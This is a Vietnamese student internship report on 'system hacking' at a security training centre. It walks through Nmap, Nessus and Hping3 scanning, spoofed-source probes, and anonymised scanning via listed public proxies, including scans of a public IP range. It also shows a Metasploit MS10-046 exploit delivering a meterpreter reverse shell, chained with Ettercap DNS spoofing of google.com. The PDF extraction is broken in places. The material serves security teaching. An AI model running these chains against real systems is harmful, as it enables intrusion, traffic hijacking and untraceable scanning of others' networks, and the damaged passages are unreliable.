Song song đó, trung tâm ATHENA còn có những chương trình đào tạo cao cấp dành riêng theo đơn đặt hàng của các đơn vị như Bộ Quốc Phòng, Bộ Công An , ngân hàng, doanh nghiệp, các cơ quan
Trang 1BÁO CÁO THỰC TẬP TỐT NGHIỆP
Đề Tài Thực Tập
SYSTEM HACKING
Người Hướng Dẫn: Thầy Võ Đỗ Thắng
Sinh Viên Thực Tập: Phạm Hoàng Hải
1
Trang 2LỜI CẢM ƠN
***********
Em xin gởi lời cảm ơn chân thành và sự tri ân sâu sắc đối với các thầy côcủa trường Đại học Gia Định, đặc biệt là các thầy cô khoa Công Nghệ Thông Tincủa trường đã tạo điều kiện cho em thực tập Và em cũng xin chân thành cám ơnthầy Võ Đỗ Thắng đã nhiệt tình hướng dẫn hướng dẫn em hoàn thành tốt khóathực tập
Trong quá trình thực tập, cũng như là trong quá trình làm bài báo cáo, khótránh khỏi sai sót, rất mong các Thầy, Cô bỏ qua Đồng thời do trình độ lý luậncũng như kinh nghiệm thực tiễn còn hạn chế nên bài báo cáo không thể tránh khỏinhững thiếu sót, em rất mong nhận được ý kiến đóng góp Thầy, Cô để em họcthêm được nhiều kinh nghiệm và sẽ hoàn thành tốt hơn bài báo cáo tốt nghiệp sắptới
Em xin chân thành cảm ơn !
2
Trang 3Nhận xét của giáo viên
*********
………
………
………
………
………
………
………
………
………
………
………
………
………
………
………
………
………
3
Trang 4MỤC LỤC
I – Giới Thiệu
1.1 Giới thiệu về ATHENA………5
1.2 Giới thiệu về System Hacking……… 9
II – Nội Dung Thực Tập Tại ATHENA 2.0 Hướng dẫn cài VMware và BackTrack 5r3……… 10
2.1 SCANNING……….28
2.2 SYSTEM HACKING……… 57
2.3 TROJAN và Backdoor……… ……… 75
2.4 Kết quả dự kiến và tài liệu……… 92
4
Trang 5GIỚI THIỆU
1.0 – Giới Thiệu Về ATHENA
Lịch sử:
Trung Tâm Đào Tạo Quản Trị Mạng & An Ninh Mạng Quốc
Tế ATHENA được thành lập từ năm 2004, là một tổ chức qui tụ nhiều trí thức trẻ Việt Nam đầy năng động, nhiệt huyết và kinh nghiệm trong lãnh vực CNTT, với tâm huyết góp phần vào công cuộc thúc đẩy tiến trình đưa công nghệ thông tin là ngành kinh tế mũi nhọn, góp phần phát triển nước nhà
Lĩnh Vực Hoạt Hộng Chính:
+ Trung tâm ATHENA đã và đang tập trung chủ yếu vào đào tạo chuyên sâu quản trị mạng, an ninh mạng, thương mại điện tử theo các tiêu chuẩn quốc tế của các hãng nổi tiếng như Microsoft, Cisco, Oracle, Linux LPI , CEH, Song song đó, trung tâm ATHENA còn có những chương trình đào tạo cao cấp dành riêng theo đơn đặt hàng của các đơn vị như Bộ Quốc Phòng, Bộ Công An , ngân hàng, doanh nghiệp, các cơ quan chính phủ, tổ chức tài chính,…
+ Sau gần 10 năm hoạt động,nhiều học viên tốt nghiệp trung
tâm ATHENA đã là chuyên gia đảm nhận công tác quản lý hệ thống
mạng, an ninh mạng cho nhiều bộ ngành như Cục Công Nghệ Thông Tin
-5
Trang 6Bộ Quốc Phòng , Bộ Công An, Sở Thông Tin Truyền Thông các tỉnh, bưu điện các tỉnh,
+ Ngoài chương trình đào tạo, Trung tâm ATHENA còn có nhiều
chương trình hợp tác và trao đổi công nghệ với nhiều đại học lớn như đại học Bách Khoa Thành Phố Hồ CHính Minh, Học Viện An Ninh Nhân Dân( Thủ Đức), Học Viện Bưu Chính Viễn Thông, Hiệp hội an toàn thông tin (VNISA), Viện Kỹ Thuật Quân Sự ,
Đội Ngũ Giảng Viên:
+Tất cả các giảng viên trung tâm ATHENA có đều tốt nghiệp từ các trường đại học hàng đầu trong nước Tất cả giảng viên ATHENA đều phải có các chứng chỉ quốc tế như MCSA, MCSE, CCNA , CCNP,
Security+, CEH,có bằng sư phạm Quốc tế (Microsoft Certified
Trainer).Đây là các chứng chỉ chuyên môn bắt buộc để đủ điều kiện tham
gia giảng dạy tại trung tâm ATHENA
+Bên cạnh đó,Các giảng viên ATHENA thường đi tu nghiệp và cập nhật
kiến thức công nghệ mới từ các nước tiên tiến như Mỹ , Pháp, Hà Lan, Singapore, và truyền đạt các công nghệ mới này trong các chương trình
đào tạo tại trung tâm ATHENA
6
Trang 91.1 – Giới Thiệu Về System Hacking
Hiện nay, rất nhiều người sử dụng máy tính hệ điều hành Windows như WIN XP, WIN 7 và các ứng dụng văn phòng như Microsoft Office 2003,2007,… cho công việc hang ngày.
Tuy nhiên những hệ điều hành trên và các ứng dụng Microsoft Office
Trang 10NỘI DUNG THỰC TẬP
2.0 – Hướng dẫn cài VMware và BackTrack 5r3
Cài VMware:
Bước 1: Các bạn download phần mềm VMware worksations trên mạng
về và cài đặt như bình thường.
10
Trang 11Bước 2: Thiết lập CẤU HÌNH MÁY ẢO cho phần mềm:
Chọn Create a new virtual Machine:
Chọn Next, rồi chọn i will install the operating system later
11
Trang 12Chọn Next, chọn HDH mà bạn muốn cài, ở đây mình chọn WINXP
12
Trang 13Chọn Next > chọn Browse để lưu file ( chọn ổ nào trống tầm 10G là đẹp ko nhất thiết là ổ đĩa C )
13
Trang 14Nhấn Next chọn dung lượng ổ cứng (cái này tùy mọi người chọn nhé )
14
Trang 16Chọn Next > chọn custumize hardware, mục này nhiều cái hay lắm
Xong rùi chọn Close rồi chọn Finish là xong!
16
Trang 17Bước 3: CÀI HỆ ĐIỀU HÀNH CHO MÁY ẢO
Cài trực tiếp từ đĩa winxp.iso,vào menu VM chọn settings chọn CD/DVD chọn đường dẫn là đĩa winxp.iso cần cài:
17
Trang 18Chọn OK rùi chọn nút màu xanh như hình dưới chọn power on để cài Win.
18
Trang 19Quá trình cài windows y chang cài trên máy thật thế là xong
19
Trang 20Cài BackTrack 5r3:
20
Trang 28Nhập vào đoạn text sau để chuyển sang giao diện đồ họa [startx]
Click chọn install trên desktop để tiếp tục cài đặt các thông số như ngày giờ,
ổ đĩa và ngôn ngữ > Xong.
Nếu muốn sử dụng lệnh thì có thể mở Terminal.Hình màu đen ở thanh trên cùng nhỏ nhỏ
28
Trang 29install trên Window và Linux.
- Mục đích bài lab: sử dụng Nmap để xác định các thông số hệ điều hành, port, dịch vụ tương ứng với…
- Nmap là một trong những network scanner rất hiệu quả Thông qua nmap ta
có thể thực hiện quá trình scan với các kỹ thuật khác nhau như SYN scan, TCP Connection scan, Xmas scan, Null scan…
Trang 30- Bước 1: ta xem giúp đỡ của câu lệnh NMAP
- Bước 2: thực hiện quá trình ping sweep cho đường mạng 192.168.1.0/24 để
xác định các host đang có trong đường mạng bằng câu lệnh “nmap -sP -v
172.16.34.1/24”
30
Trang 31- Bước 3: Ta cần xác định xem ở IP 172.16.34.18 đang có nhưng port nào đang
mở Để làm việc này ta có thể sử dụng các dạng scan khác nhau Ví dụ ở đây
ta sử dụng kỹ thuật SYN scan với câu lệnh “nmap –sS 172.16.34.18”
31
Trang 32- Bước 4: xác định giá trị port trong quá trình scan Mặc định chương trình sẽscan tất cả các port Ví dụ ta cần xác định trong đường mạng 172.16.34.1/24thì đang có bao nhiêu máy đang mở port 445,139,80,3389 ta có thể sử dụng
câu lệnh “nmap -sT -p 445,139,3389 172.16.34.1/24”
32
Trang 33- Bước 5: Sử dụng nmap scan đường mạng với IP Public bên ngoài với câu lệnh
“nmap -sS -p 80 222.253.166.1/24 > /root/Desktop/scan_adsl.txt” Như
vậy kết quả scan sẽ được ghi thành file scan_adsl.txt
- Bước 6: Sử dụng nmap để xác định các thông số của các ứng dụng được triển
khai trên server Ta sử dụng “nmap -p 1-65535 -T4 -A -v 192.168.0.4”
33
Trang 34Bước 7: Trong nmap hỗ trợ sử dụng các scripts đển scan một lỗi ứng dụng nào đó Đầu tiên ta có thể sử dụng câu lệnh “locate nmap” để xác định các file script đang được hỗ trợ trong nmap Ví dụ ta có thể sử dụng kiểm tra lỗi ms08-067 của các
máy trong đường mạng “nmap -sT script smb-check-vulns.nse -p 139,445
172.16.34.1/24”
Ngoài ra ta có thể kiểm tra xem trong mạng có máy nào đang chuyển card mạng
sang Promicious mode để sniffer traffic trên đường truyền “nmap script sniffer-
detect 172.16.34.1/24”
- Bước 8: Trong quá trình scan ta nên thay đổi các giá trị IP source, lưu lượng gói tin gửi trong thời gian 1 giây, thực hiện phân mảnh gói tin, giả thông số ttl Ví dụ
34
Trang 35ta thực hiện câu lệnh “nmap -sS -p 3389,445,139,23,22,80 max-rate 50 -S
-e: xac dinh interface
-ttl: xac dinh gia tri ttl ( mac dinh window la 128 )
35
Trang 36Bài 2: Scanning Nmap Thông Qua ProxyChains
1 M ụ c đ í c h b ài lab
- Sơ đồ bài lab như sau:
192.168.1.0/24
36
Trang 37- PC attacker sử dụng hệ điều hành Back Track 5, trong đó đã được install mặc định chương trình nmap Ngoài ra ta có thể download và cài đặt nmap có thể install trên Window và Linux.
- Mục đích bài lab: ta cấu hình công cụ proxychain làm local proxy chương
trình nmap Proxy chain sẽ kết nối đến một Proxy Server ngoài mạng internet Như vậy thì nmap sẽ scan victim server thông qua một proxy server
2 C ác b ư ớ c t h ự c h i ệ n
- Bước 1: Install và Configure Proxychains Nếu như máy linux ta chưa có install
Proxychains, ta thực thi câu lệnh bên
dưới nhanld@nhanld-laptop:~$
sudo su [sudo] password for
nhanld:
root@nhanld-laptop:/home/nhanld# apt-get install proxychains
Vị trí file cấu hình cho proxychains tại /etc/proxychains.conf
nhanld@nhanld-laptop:~$gedit /etc/proxychains.conf
Ta sẽ bỏ dấu # trước dòng strict_chain trong file cấu hình.
37
Trang 38Tìm kiếm một số trang web cung cấp proxy server Proxychains hỗ trợ các phương thức
là HTTP Proxy, SOCK 4 và SOCK 5 Ta có thể dùng các từ khóa để tìm kiếm trên Google “free proxy server list” hoặc “free proxy server list sock”
- Cấu hình ProxyChains hỗ trợ các dạng Proxy Ví dụ, ta sẽ thêm một số dòng
vào file /etc/proxychains.conf
http 94.23.236.217 80 http 83.216.184.132 8080 sock5 203.206.173.4 1080 sock4 85.119.217.113 1080 sock4 201.55.119.43 1080
- Bước 2:Install Nmap từ Source Ta có thể download source Nmap từ trang web http://nmap.org/download.html Thực hiện quá trình install từ source, ta
chọn install vào đường dẫn là /opt/nmap
- Bước 3: dùng Nmap scan thông qua Proxychains Để thực hiện câu lệnh scan
bằng tool nmap thông qua proxychains, ta nhập vào câu lệnh proxychains và
tiếp theo là câu lệnh của Nmap
38
Trang 39root@nhanld-laptop:/home/nhanld/Downloads/nmap-5.51#
proxychains nmap -sS 27.0.12.130
ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 5.51 ( http://nmap.org ) at 2011-06-14 16:27
ICT Warning: File /nmap-services exists, but Nmap is using
/opt/nmap/share/nmap/nmap-services for security and consistency reasons set NMAPDIR= to give priority to files in your local directory (may affect the other data files too).
Nmap scan report for mail.kaka.vn (27.0.12.130)
Trang 40Bài 3: Nessus Scanning
2 Các b ước thực hiện:
- Bước 1: Đầu tiên ta sẽ download và đăng ký Activation Code tại trang web h t tp: //w w w t en a b le c om/ p r o duc ts/ n essu s Các thao tác cấu hình của Nessus sẽđược thực hiện trên nền giao diện web
- Bước 2: Sau khi cài đặt xong, ta sử dụng trình duyệt web kết nối
vào h t tp s:/ / l o c al h o s t : 8 8 34 để điều khiển Nessus
40
Trang 41- Bước3:Tiếptụ
c địnhnghĩa ra username và password
41
Trang 42Bước 4: Nhập vào Activation Code
-
42
Trang 43Bước 6: Cấu hình Nessus scan vulnerable của hệ điều hành và ứng dụng Các bướcchính ta cần cấu hình:
o Tạo Policy và chọn phương thức scan
o Chọn đối tượng scan
o Kiểm tra kết quả và xuất report
Đầu tiên ta login vào Nessus bằng cách sử dụng đường link h t t p s:/ / l o c al h o s t : 8 8 34
43
Trang 44Click vào Policies, click vào Add, định nghĩa ra một profile scan Ở đây ta địnhnghĩa ra profile có tên là Athena Scan.
44
Trang 45ập vàouserna
me
và password xácthự
c
để scan (ta có thể scan được nhiều lỗi
hơn) hoặc ta không nhập username và password
45
Trang 47Chọn Windows: Microsoft Bullentins để scan các lỗi của hệ điều hành Window.
Thông tin database ta để mặc định
Trang 49- Bước7:Tiếptụ
c
ta
Click vào SCANS , xác định Policy là Athena Scan, Scan
Trang 50Target nhập vào IP 192.168.1.236 để cấu hình các đối tượng để scan.
- Bước 8: Cuối cùng ta xem kết quả scan và xuất report
Trang 53Bài:Hping scanning
1 M ụ c đ í c h b ài lab
- Sơ đồ bài lab như sau:
- PC attacker sử dụng hệ điều hành Back Track 5, trong đó đã được install mặc
định chương trình nmap Ngoài ra ta có thể download và cài đặt nmap có thể
install trên Window và Linux
- Mục đích bài lab: sử dụng Hping để xác định các thông số hệ điều hành, port,
dịch vụ tương ứng với Ngoài ra Hping cho phép ta tạo ra những gói tin theo ý mình và dễ dàng điều chỉnh lưu lượng
2 C ác b ư ớ c t h ự c h i ệ n
- Bước 1: Hping là một trong những công cụ scan tốt Nó cho phép ta tạo ra các góitin theo ý muốn, điều chỉnh số lượng gói tin gửi … Mặc định hping2, hping3 được cài đặt mặc định trong Back Track 5 Ta có thể xem giúp đỡ bằng câu lệnh “hping3 help”
Trang 54-
Bước 2: Sử dụng hping để gửi standard ICMP packet đến target Bằng câu lệnh
“hping3 –icmp –c 4 athena.edu.vn”
Trang 55- Bước 3: Tiếp theo ta sử dụng lại câu lệnh ở trên và thêm vào 2 biến
o –d kích thước data trong gói tin
o –V hiển thị thông tin đầy đủ
- Bước 4: Sử dụng biến –j để xem kết quả output dạng hexa decimal
Trang 56- Bước 5: Sử dụng hping3 gửi SYN packet đến một host Ta sẽ thêm biến –S và – p để xác định giá trị port 25 Trên màn hình ta sẽ nhận được 4 packet với “SA”
flag Với giá trị SYN/ACK trả về nghĩa là port này Open Câu lệnh ta phải nhập vào
là “hping3 –S –p 25 –c 4 athena.edu.vn ”
-Bước 6: Attacker gửi ACK Probe với giá trị sequence number random Nếu như không
có packet response nghĩa là port được filter ( có stateful firewall) Nếu RST
packet reponse nghĩa là port không có được filter (không có firewall) Ta có thể
xác định thêm giá trị source port cho câu lệnh Ack Scan ở trên bằng biến
–s Ví dụ ta sẽ nhập vào câu lệnh “hping3 –A –p 25 -s 5555 –c 4 athena.edu.vn”
Trang 57-
Bước7:
Ta có thể spoofing IP bằng biến –a Ví dụ ta nhập vào câu lệnh như sau
“hping3 -S -p 80 -s 5555 -a 192.168.1.121 -c 10 192.168.1.254”
Nếu như ta sử dụng wireshark capture traffic thì sẽ thấy traffic giữa 2 IP
192.168.1.121 và IP 192.168.1.254
Trang 58- Bước 8: Để scan cùng 1 lúc nhiều port thì ta sẽ sử dụng option scan [port
cần scan] Ví dụ “hping3 –S –scan 80,443,25,85-90 –V athena.edu.vn”
Trang 60- Máy attacker sử dụng chương trình Metasploit đã được cài đặt sẵn.
Trang 61msf >set payload windows/meterpreter/reverse_tcp
msf exploit(ms10_046_shortcut_icon_dllloader) >set LHOST 192.168.1.10
Trang 62[*] Started reverse handler on 192.168.1.10:4444
[*]
[*] Send vulnerable clients to \\192.168.1.10\EPzSUxdEj\
[*] Or, get clients to save and render the icon of http://<your
- Ta cấu hình file etter.dns (/usr/share/ettercap/etter.dns) với IP của trang
www g o o g le.com là IP của attacker 192.168.1.10 bằng cách thêm vào 2 dòngsau
Trang 63www.google.com A 192.168.1.10
www.google.com PTR 192.168.1.10
- Thực hiện quá trình dns spoofing
Ettercap -T -q –M arp:remote –P dns_spoof –i eth0 /192.168.1.11/ //
- Tại máy client nhập vào trang web www g o o gl e c om và hiện ra màn hình giốngnhư bên dưới
Trang 643 Ki ể m tra me tas p l o it
- Metasploit trả ra cho ta các dòng log như bên dưới
msf exploit(ms10_046_shortcut_icon_dllloader) > [*] Sending UNC redirect to192.168.1.11:1655
[*] Sending UNC redirect to 192.168.1.11:1655
[*] Responding to WebDAV OPTIONS request from 192.168.1.11:1660
[*] Received WebDAV PROPFIND request from 192.168.1.11:1660 /EPzSUxdEj[*] Sending 301 for /EPzSUxdEj
[*] Received WebDAV PROPFIND request from 192.168.1.11:1660 /
EPzSUxdEj/ [*] Sending directory multistatus for /EPzSUxdEj/
[*] Received WebDAV PROPFIND request from 192.168.1.11:1660 /EPzSUxdEj[*] Sending 301 for /EPzSUxdEj
[*] Received WebDAV PROPFIND request from 192.168.1.11:1660 /EPzSUxdEj/[*] Sending directory multistatus for /EPzSUxdEj/
[*] Received WebDAV PROPFIND request from 192.168.1.11:1660 /EPzSUxdEj[*] Sending 301 for /EPzSUxdEj
[*] Received WebDAV PROPFIND request from 192.168.1.11:1660 /
EPzSUxdEj/ [*] Sending directory multistatus for /EPzSUxdEj/
[*] Received WebDAV PROPFIND request from 192.168.1.11:1661 /EPzSUxdEj[*] Sending 301 for /EPzSUxdEj
[*] Received WebDAV PROPFIND request from 192.168.1.11:1661 /
EPzSUxdEj/ [*] Sending directory multistatus for /EPzSUxdEj/